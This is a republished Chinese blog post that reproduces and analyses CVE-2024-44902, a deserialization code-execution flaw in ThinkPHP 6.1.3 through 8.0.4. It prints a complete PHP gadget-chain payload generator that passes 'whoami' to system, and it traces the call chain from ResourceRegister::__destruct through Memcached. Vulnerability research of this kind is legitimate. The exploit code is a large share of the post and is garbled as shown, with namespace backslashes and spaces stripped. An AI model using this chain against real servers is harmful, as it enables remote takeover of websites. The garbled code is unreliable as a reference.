CTF导航 CTF导航

CVE-2024-44902 Thinkphp反序列化漏洞复现和分析

渗透技巧 4天前 admin
32 0 0

漏洞介绍

Thinkphp v6.1.3至v8.0.4版本中存在反序列化漏洞,攻击者可利用此漏洞执行任意代码。

影响版本

v6.1.3 <= thinkphp <= v8.0.4

漏洞复现

先自己构造一个序列化的入口

class Index extends BaseController
{
    public function test($data){
        unserialize($data);
    }
}

然后利用下面的payload生成序列化数据。

paylod

<?php
namespace thinkcachedriver;
use thinkmodelPivot;
classMemcached{
protected $options=[];
function __construct()
{
        $this->options["username"]=newPivot();
}
}

namespace thinkmodel;
use thinkmodel;
classPivotextendsModel
{

}

namespace think;
abstractclassModel{
private $data =[];
private $withAttr =[];
protected $json =[];
protected $jsonAssoc =true;
function __construct()
{
        $this->data["fru1ts"]=["whoami"];
        $this->withAttr["fru1ts"]=["system"];
        $this->json=["fru1ts"];
}
}

namespace thinkroute;
use thinkDbManager;
classResourceRegister
{
protected $registered =false;
protected $resource;
function __construct()
{
        $this->registered=false;
        $this->resource=newDbManager();
}
}
namespace think;
use thinkmodelPivot;
classDbManager
{
protected $instance =[];
protected $config =[];
function __construct()
{
        $this->config["connections"]=["getRule"=>["type"=>"\think\cache\driver\Memcached","username"=>newPivot()]];
        $this->config["default"]="getRule";
}
}

use thinkrouteResourceRegister;
$r=newResourceRegister();
echo urlencode(serialize($r));

将生成的序列化数据同过我们构造的序列化漏洞地址进行触发。

CVE-2024-44902 Thinkphp反序列化漏洞复现和分析

漏洞分析

这个利用链和Tp6的利用链最后触发代码执行的链子一样。最后触发的利用链都是下面这个。

Conversion->__toString() –> Conversion->toJson() –> Conversion->toArray() –> Attribute->getAttr() –> Attribute->getValue()

和Tp6不同的是触发方法不一样,在Tp6中的入口方法为:thinkModel::__destruct方法,然后触发到Conversion,完整的链子为:

Model->__destruct()-->Model->save()-->Model->updateData()-->Model->checkAllowFields()-->Conversion->__toString()-->Conversion->toJson()-->Conversion->toArray()-->Attribute->getAttr()-->Attribute->getValue()

但是在Tp8源码中发现thinkModel::__destruct入口点已经不能用了,参考Payload给出的入口点是 thinkrouteResourceRegister::__destruct

所以完整的调用链如下。

DbManager->createConnection()-->ResourceRegister->__destruct()-->ResourceRegister->register()-->DbManager->__call()-->DbManager->connect()-->DbManager->instance()-->DbManager->createConnection()-->Memcached->__construct()-->Conversion->__toString()-->Conversion->toJson()-->Conversion->toArray()-->Attribute->getAttr()-->Attribute->getValue()

但是这个利用链也是有一个前提就是php必须已经加载了Memcached模块,因为这个利用链中的Memcached->__construct() 就是涉及到创建Memcached对象。

CVE-2024-44902 Thinkphp反序列化漏洞复现和分析

参考链接

https://avd.aliyun.com/detail?id=AVD-2024-44902

https://github.com/fru1ts/CVE-2024-44902

https://xz.aliyun.com/t/15582

https://www.freebuf.com/vuls/263746.html


原文始发于微信公众号(天启实验室):CVE-2024-44902 Thinkphp反序列化漏洞复现和分析

版权声明:admin 发表于 2024年9月15日 下午2:54。
转载请注明:CVE-2024-44902 Thinkphp反序列化漏洞复现和分析 | CTF导航

相关文章

Dock Tile Plugins Could Be Used to Escalate Privileges
admin
58
攻击技术研判 | 持久化新方式:计划任务启动PowerShell.exe实现持久化
admin
842
区块链 FiatExchanger 2.2.1 SQL 注入
admin
491
内部网络安全纵深防御体系构建(方案设计与实施)
admin
55
簡單分析 CVE-2023-46729:Sentry Next.js SDK 的 URL rewrite 漏洞
admin
93
顺丰网络安全DFIR平台实践之路
admin
509

相关文章

web选手入门pwn(20) ——csu+magic
0
绕过 CSP,实现 Netlify CDN 上XSS
0
法国EURECOM | X-Ray-TLS : 通过从内存中提取会话密钥对TLS会话进行透明解密
0
浅谈Cocos2djs逆向
0
FortiGate SSLVPN 堆溢出漏洞分析与利用
0
VMware设备虚拟化漏洞挖掘(下篇)
0
SGN编码器——最好的Shellcode编码器
0
使用 Joern 进行漏洞挖掘
0
第104篇:解密希拉里”邮件门”中鱼叉钓鱼攻击的技术细节
0
原创 Paper | 使用 Peach 进行基于变异和生成的 fuzzing
0